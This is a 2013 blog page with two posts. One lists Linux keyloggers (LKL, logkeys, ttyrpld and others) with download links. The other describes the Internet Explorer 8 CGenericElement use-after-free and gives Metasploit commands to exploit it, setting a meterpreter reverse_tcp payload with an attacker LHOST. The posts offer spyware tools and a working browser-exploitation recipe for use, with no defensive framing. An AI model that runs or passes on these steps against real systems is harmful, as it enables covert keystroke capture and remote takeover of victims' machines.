Monday, May 13, 2013

List of Linux Key loggers

1 comments
(1)LKL:-
LKL is a user space keylogger that runs under linux--x86/arch. LKL sniffs and logs everything passes trought the hardware keyboard port (0x60).

Download From here

(2)Log Key:-
logkeys is a linux keylogger. It is no more advanced than other available linux
keyloggers, notably lkl and uberkey, but is a bit newer, more up to date, it doesn't unreliably repeat keys and it shouldn't crash your X. All in all, it just seems to work. It relies on event interface of the Linux input subsystem.

Once completely set, it logs all common character and function keys, while also
being fully aware of Shift and Altr key modifiers.

Download from here

(3)Ttypld:-
ttyrpld is a kit to log any traffic and actions which go through any of your Kernel's tty
devices. In common-term language, this is a Keylogger

Download from here

(4)uber key :-
Download link

(5)Vlogger:-
Download link

(6)Simple keylogger Python script:-
Download here

If you are free & want to learn how keyboard driver works in linux kernal , I would recommended you to read from following link .

Also read this article which is quite interesting. http://theinvisiblethings.blogspot.in/2011/04/linux-security-circus-on-gui-isolation.html

Monday, May 6, 2013

Exploit 0Day vulnerability in Internet Exploit 8

2 comments
Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability

This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.

Exploit Targets

    0 - Automatic (default)
    1 - IE 8 on Windows XP SP3
    2 - IE 8 on Windows Vista
    3 - IE 8 on Windows Server 2003
    4 - IE 8 on Windows 7

msf > use exploit/windows/browser/ie_cgenericelement_uaf
msf exploit(ie_cgenericelement_uaf) > show payloads
msf exploit(ie_cgenericelement_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_cgenericelement_uaf) > set LHOST [MY IP ADDRESS]
msf exploit(ie_cgenericelement_uaf) > exploit

UA-35960349-1